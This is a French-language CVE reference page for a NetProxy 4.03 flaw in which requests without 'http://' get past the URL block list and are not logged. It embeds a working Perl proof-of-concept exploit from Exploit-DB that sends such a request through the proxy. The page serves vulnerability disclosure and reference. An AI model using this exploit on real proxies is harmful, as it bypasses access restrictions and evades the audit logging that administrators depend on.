CVE-2007-1225 : Détail

CVE-2007-1225

3.5%V4
Network
2007-03-02
21h00 +00:00
2017-10-09
22h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The connection log file implementation in Grok Developments NetProxy 4.03 does not record requests that omit http:// in a URL, which might allow remote attackers to conduct unauthorized activities and avoid detection.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 3381

Date de publication : 2007-02-26 23h00 +00:00
Auteur : Craig Heffner
EDB Vérifié : Yes

#!/usr/bin/perl ########################################################################### # # Application: # # NetProxy 4.03 # http://www.grok.co.uk/netproxy/index.html # # Description: # # NetProxy includes a powerful web cache to boost # performance and reduce online costs. There is # also an application-level firewall to protect your # network from unwanted access, full access logging # to allow you to track Internet usage, and # password-protected access to various Internet resources. # # Vulnerability: # # Sending a specially crafted request to the proxy server # allows users to view restricted Web content and bypass # the logging feature. # # Exploit: # # Assume that access to http://www.milw0rm.com has been blocked. # The standard query string sent to NetProxy looks like: # # GET http://www.milw0rm.com HTTP/1.0 # # NetProxy recognizes that this is a blocked URL and subsequently # blocks the request. However, sending a request without 'http://' # in the URL allows access to the blocked URL (note that the port # must be manually specified as well): # # GET www.milw0rm.com:80 HTTP/1.0 # # In addition, requests made in this manner are not logged to # NetProxy's connection log file. # # Work-Around/Fix: # # Since the application automatically prepends the 'http://' string # to every URL specified in the block list, this technique should work # for all restricted Web sites, and ensures that there is no easy fix # for this security hole. POC code follows. # # Credit: # # Exploit discovered and coded by Craig Heffner # http://www.craigheffner.com # heffnercj [at] gmail.com ########################################################################### use IO::Socket; #Define the NetProxy server and port $proxy_ip = "127.0.0.1"; $proxy_port = "8080"; #Set the site, port and page to request $site = "www.milw0rm.com"; $port = "80"; $page = "index.html"; #Define FF and IE user agent strings $ms_ie = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"; $ms_ff = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"; #Create connection to NetProxy my $sock = new IO::Socket::INET( Proto => 'tcp', PeerAddr => $proxy_ip, PeerPort => $proxy_port, ); die "Failed to connect to [$proxy_ip:$proxy_port] : $!\n" unless $sock; #Format the request $request = "GET $site:$port/$page HTTP/1.0\r\n"; $request .= "User-Agent: $ms_ff\r\n"; $request .= "\r\n"; #Send the request print $sock $request; #Read the reply while(<$sock>){ $reply .= $_; } close($sock); #Separate NetProxy header from HTML ($header,$html) = split("\r\n\r",$reply); print $html; exit; # milw0rm.com [2007-02-27]

Products Mentioned

Configuraton 0

Grok_developments>>Netproxy >> Version 4.03

    Références

    https://www.exploit-db.com/exploits/3381
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://www.vupen.com/english/advisories/2007/0779
    Tags : vdb-entry, x_refsource_VUPEN
    http://osvdb.org/36002
    Tags : vdb-entry, x_refsource_OSVDB
    http://www.securityfocus.com/bid/22741
    Tags : vdb-entry, x_refsource_BID